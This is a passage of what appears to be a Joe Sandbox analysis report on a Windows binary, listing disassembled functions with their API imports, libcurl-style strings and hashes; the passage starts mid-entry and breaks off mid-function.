                                    • Instruction ID: 27fe7e4b0e80afbd6824d83462a980b87df5d29d875539f0b4814a69f7540093
                                    • Opcode Fuzzy Hash: f22fe58649079072ae50b5ab467679f4346842be06c1cf1f43628fbd1f830b4a
                                    • Instruction Fuzzy Hash: A931FB31704B02ABEF1C5B34B895BAAB3D1AB95754F10226EE519BB2C1DF706891C7C4
                                    Function 00E304FF Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 00E305B5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?), ref: 00E305F1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 00E30612
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
                                    • API String ID: 1294909896-2961970465
                                    • Opcode ID: dd0613f4cd3dfcd905d21a5622508f5993d5cd61265f3f37a2917214fd7ed378
                                    • Instruction ID: dd548b8e82ed11a6c0ccbd388dbd94858b02cac3c1816e9d17aa61e7d7ec37d8
                                    • Opcode Fuzzy Hash: dd0613f4cd3dfcd905d21a5622508f5993d5cd61265f3f37a2917214fd7ed378
                                    • Instruction Fuzzy Hash: F531E635B44209EFDF089B94EC657AEBBB5EF84354F10507AD801B7241DBB1AD19CBA0
                                    Function 00E3CD83 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3CDAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3CE26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: OS/400$SITE NAMEFMT 1
                                    • API String ID: 3061335427-2049154998
                                    • Opcode ID: ea3bcf87a245c70b35d37986c5f6fccaff842581a01f7870bc00ca48831c81f6
                                    • Instruction ID: d7f26ee2f77ca1d882471598c22bacd59f95b8554c2a91e2952f315574a4aa28
                                    • Opcode Fuzzy Hash: ea3bcf87a245c70b35d37986c5f6fccaff842581a01f7870bc00ca48831c81f6
                                    • Instruction Fuzzy Hash: 2431C171A04215CFCF14DF68E8486AD7FB0AF48754F2460B6E849FB252CB709D06CBA0
                                    Function 00E0EDCE Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00E0EE54
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E0EE65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                    • API String ID: 1294909896-250881521
                                    • Opcode ID: 6f42efd67b98387ba86d3913998bbccc982eb97d90d27e625446e6bfe1b33832
                                    • Instruction ID: 922425685190ee101cd0577ec69595cf3ed48fbc82d131b0800a28c68a548e47
                                    • Opcode Fuzzy Hash: 6f42efd67b98387ba86d3913998bbccc982eb97d90d27e625446e6bfe1b33832
                                    • Instruction Fuzzy Hash: F9210732985724BFCB320794FC82B5A73949B84BB4B182670FC26FB3D0EB608D418291
                                    Function 00E23B5F Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 81COMMON
                                    Download Yara Rule
                                    APIs
                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E23B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: tolower
                                    • String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
                                    • API String ID: 3025214199-127164392
                                    • Opcode ID: f0d681e7554056bc63d04d206b0f23a5ccfe3883f8bfd206cf42a64fda011008
                                    • Instruction ID: e5737fce089fd1f8975bd11f663f98c80f6354315058e08a6c6f46a9aab852de
                                    • Opcode Fuzzy Hash: f0d681e7554056bc63d04d206b0f23a5ccfe3883f8bfd206cf42a64fda011008
                                    • Instruction Fuzzy Hash: 5F214C31E0027547CB319B347C41AFAB7A59F917A4F0571E9EC89BB341DE688E498BD0
                                    Function 00E28AFD Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,00000000,00000001,000009C9,000009C9,?,00E21E86,?,?,00000000), ref: 00E28B1D
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00E21E86,?,?,00000000), ref: 00E28B30
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00E21E86,?,?,00000000), ref: 00E28B3C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E28B69
                                    • closesocket.WS2_32(00E21E86), ref: 00E28B7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28B94
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                    • String ID:
                                    • API String ID: 469868127-0
                                    • Opcode ID: fd59529dbc7410e089410215948a8ebf37c8dbf89e602e61f51584ef7a3ca395
                                    • Instruction ID: 5499ac42758fafc3342471efec4d0c1a27a5b2db5eb82c5d3a1bca8990e5a9bd
                                    • Opcode Fuzzy Hash: fd59529dbc7410e089410215948a8ebf37c8dbf89e602e61f51584ef7a3ca395
                                    • Instruction Fuzzy Hash: A511CE3A601A24EFCB099F61E958B5EBBB1FF48322F144059E805B7261DB70BC54CBE0
                                    Function 00E2B751 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 302networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2B8C8
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E2B9D9
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00E2B9F4
                                    Strings
                                    • Failed to alloc scratch buffer, xrefs: 00E2B8D5
                                    • We are completely uploaded and fine, xrefs: 00E2BAC3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Ioctlmallocsetsockopt
                                    • String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
                                    • API String ID: 3560301164-2419666956
                                    • Opcode ID: d98c5203e23d7829c3e3be35af50192a7f4423c9096820ebf92b504a2fa1744c
                                    • Instruction ID: 9413ae9807c8e495b7fe9a83b3de7613644600ec751429b8b31d95a023989b00
                                    • Opcode Fuzzy Hash: d98c5203e23d7829c3e3be35af50192a7f4423c9096820ebf92b504a2fa1744c
                                    • Instruction Fuzzy Hash: B6C1B171B04656AFDB18CF28D881BEAB7F5FF44314F185279E858EB281D770A844CBA1
                                    Function 00E457F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4589A
                                    • WSAGetLastError.WS2_32 ref: 00E45A16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E45A73
                                    Strings
                                    • select/poll on SSL socket, errno: %d, xrefs: 00E45A1D
                                    • schannel: timed out sending data (bytes sent: %zd), xrefs: 00E45A34
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastfreemalloc
                                    • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                    • API String ID: 1010545285-3891197721
                                    • Opcode ID: 6ad4df961ce2a46ec4ebeeefbdbf970b5adc05cc52c565fa576fd4dffb7321fd
                                    • Instruction ID: 10f8bc6514e250da37a6d1d4278d77746c727eb4255fd35a9a6834a11e183ef0
                                    • Opcode Fuzzy Hash: 6ad4df961ce2a46ec4ebeeefbdbf970b5adc05cc52c565fa576fd4dffb7321fd
                                    • Instruction Fuzzy Hash: 07813C726087019FC714CF19E880A5ABBE5FFC8724F145A2EF899A73A1D770D844CB82
                                    Function 00E4DDC3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • isupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,?), ref: 00E4DE6E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E4E5FF,?,00000000), ref: 00E4DED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freeisupper
                                    • String ID: 0)$dO
                                    • API String ID: 2487258334-479543974
                                    • Opcode ID: 55e3e93784c4974688ed10e5120786b5af9e6775c426968423768deddd1252c0
                                    • Instruction ID: 86204f005d320177697b2e6f0f13611ec8e67fe3fdf8e02c2781115cf62ebf01
                                    • Opcode Fuzzy Hash: 55e3e93784c4974688ed10e5120786b5af9e6775c426968423768deddd1252c0
                                    • Instruction Fuzzy Hash: B041F431E0C1569FCF269B69FC906FDBBB2AFA5314F2450AAD452BB241DB309C45CB50
                                    Function 00E0D5FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0D618
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E607BC), ref: 00E0D631
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E607BC), ref: 00E0D6C9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0D715
                                    Strings
                                    • unrecognized protocol '%s', xrefs: 00E0D6AF
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strtok$_strdupfree
                                    • String ID: unrecognized protocol '%s'
                                    • API String ID: 2873614617-1936080967
                                    • Opcode ID: afad9ae76717016c437b18eb4e5cc485a6486b1e29f64f7ef2ab029108c961d7
                                    • Instruction ID: ff54c1df09fb1adb8292759ecb79335bff9f871f58c6d55c839f38aae81145b9
                                    • Opcode Fuzzy Hash: afad9ae76717016c437b18eb4e5cc485a6486b1e29f64f7ef2ab029108c961d7
                                    • Instruction Fuzzy Hash: D8312832A0C6119BD7219BE8AC8577ABBE1EB45799F242026E409F72C1D7729C80CB80
                                    Function 00E3526D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000), ref: 00E35305
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3533E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E3535A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35391
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: realm
                                    • API String ID: 2653869212-4204190682
                                    • Opcode ID: 67fe6250a5dd7a64ff7e2aa260ab0bc79a0d1e1fd98a8bf263412d5c9baed8db
                                    • Instruction ID: d86306ca72b5843ec0ca89a9e111efc89eecc8d13e7cdf453452df9b76cad7fa
                                    • Opcode Fuzzy Hash: 67fe6250a5dd7a64ff7e2aa260ab0bc79a0d1e1fd98a8bf263412d5c9baed8db
                                    • Instruction Fuzzy Hash: FA31E132900B148FCB249F25EC94ABEBBB4EF45355F14549EE885B7252DBB09C88CF50
                                    Function 00E375C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E37629
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E3766C
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(-000001F4,-000001F4,?,000003E8,00000000), ref: 00E3769F
                                    Strings
                                    • Connection time-out, xrefs: 00E375F6
                                    • set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 00E3768B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_time64
                                    • String ID: Connection time-out$set timeouts for state %d; Total % I64d, retry %d maxtry %d
                                    • API String ID: 3039015236-3364887516
                                    • Opcode ID: 13e421e827d06b211f9fd41eb3f0b5fbba2626a28773e2b0cf392da16c2dddef
                                    • Instruction ID: 75346b972b95e42347c84f174639b111f9440f0a79040721adf939945b062e6c
                                    • Opcode Fuzzy Hash: 13e421e827d06b211f9fd41eb3f0b5fbba2626a28773e2b0cf392da16c2dddef
                                    • Instruction Fuzzy Hash: 8E21F7B1648B006FD7349E299C5AE777AD9EBC4710F201E2EF4C5E6190FA619940C790
                                    Function 00E10878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,00000000,00000000,?,?,00E109E5,00000000,?,00E107A5,?,?), ref: 00E10896
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00E109E5,00000000), ref: 00E108FD
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E61D90,00000000,00E109E5,00000000,?,00E107A5,?,?), ref: 00E1093B
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,?,?), ref: 00E1094F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputc$fputs
                                    • String ID: u%04x
                                    • API String ID: 1019900953-2707630279
                                    • Opcode ID: 48267c9c4c28850bd68c3d805607caf314a463c0568a7890e9dd4f1178289f8a
                                    • Instruction ID: 65c6e08714818aed3f75128a265d9327db8eaddb73aa059001166fad409dc21c
                                    • Opcode Fuzzy Hash: 48267c9c4c28850bd68c3d805607caf314a463c0568a7890e9dd4f1178289f8a
                                    • Instruction Fuzzy Hash: CF212532289310B9A629053EBC3D9FB6F58DBC37F97287406F109B2497C9D145C1C190
                                    Function 00E3A10A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(?,?,?), ref: 00E3A14D
                                    • accept.WS2_32(?,?,00000080), ref: 00E3A175
                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 00E3A1D8
                                    Strings
                                    • Connection accepted from server, xrefs: 00E3A1A7
                                    • Error accept()ing server connect, xrefs: 00E3A192
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: acceptgetsocknameioctlsocket
                                    • String ID: Connection accepted from server$Error accept()ing server connect
                                    • API String ID: 36920154-1795061160
                                    • Opcode ID: bc6549e5397a51bbb1e422662cc8a32d6b60b1949cb060de016f0e814a845773
                                    • Instruction ID: db87cf6003a269e43586c0ec7f4e41e1a6a69bab20733eeed26cf384f0400247
                                    • Opcode Fuzzy Hash: bc6549e5397a51bbb1e422662cc8a32d6b60b1949cb060de016f0e814a845773
                                    • Instruction Fuzzy Hash: 6331D531A00214AFDB149B34DC59BEAB7B8BF44314F1441B9E849B72D1DF701D88CBA1
                                    Function 00E394C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E39557
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E39584
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E395A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrcallocfree
                                    • String ID: +$Got unexpected pop3-server response
                                    • API String ID: 1802162112-3277052657
                                    • Opcode ID: 2764b2408075901713396ea79ece7b04c6a579ebdce2a0e626e6356d0f75231f
                                    • Instruction ID: c661f969f127b7d2befa695b28a876a8fba92583fb1e3002cc475be4b058975f
                                    • Opcode Fuzzy Hash: 2764b2408075901713396ea79ece7b04c6a579ebdce2a0e626e6356d0f75231f
                                    • Instruction Fuzzy Hash: 95313B72A05202BFDB2ADF25E849799BFE4EF00364F10015AD845B7142DBF06D84C6A4
                                    Function 00E2E822 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2E982,00000000,?,?,?,00E2EB73), ref: 00E2E849
                                    • htons.WS2_32(?), ref: 00E2E85B
                                    • inet_pton.WS2_32(00000017,::1,?), ref: 00E2E877
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callochtonsinet_pton
                                    • String ID: ::1$localhost
                                    • API String ID: 4237634067-466958357
                                    • Opcode ID: f68ecc8826cee04a97fced0f60b5adc38f47de23ef2aca53a8a5185cae8ae745
                                    • Instruction ID: 90f6cbdf5cf3ba2fa86af74a306a617e1b8172f1e33d052c40be230806e6bd43
                                    • Opcode Fuzzy Hash: f68ecc8826cee04a97fced0f60b5adc38f47de23ef2aca53a8a5185cae8ae745
                                    • Instruction Fuzzy Hash: BD21C2725103189FDB08CF65E885B9B77F5EF49325F104029E804BF281D7B0A908CB95
                                    Function 00E232EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E2333A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E2336C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E233AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errnofreestrtoul
                                    • String ID: 0kv@qv@/lv$Invalid zoneid: %s; %s
                                    • API String ID: 3069384960-3758071802
                                    • Opcode ID: 6141915c01fe451c340ccd982319425c82ca3bca51bffd8b0b73c816e7ce6b9e
                                    • Instruction ID: 17c038c95f743d07f8952080052098300a8ed12070948b68982e0db2eb0157dd
                                    • Opcode Fuzzy Hash: 6141915c01fe451c340ccd982319425c82ca3bca51bffd8b0b73c816e7ce6b9e
                                    • Instruction Fuzzy Hash: 8521F932A002289FDB24DF24FC45AED77A9EF85314F000456E919B7190DE745E488F91
                                    Function 00E2E8E1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • htons.WS2_32(?), ref: 00E2E8FF
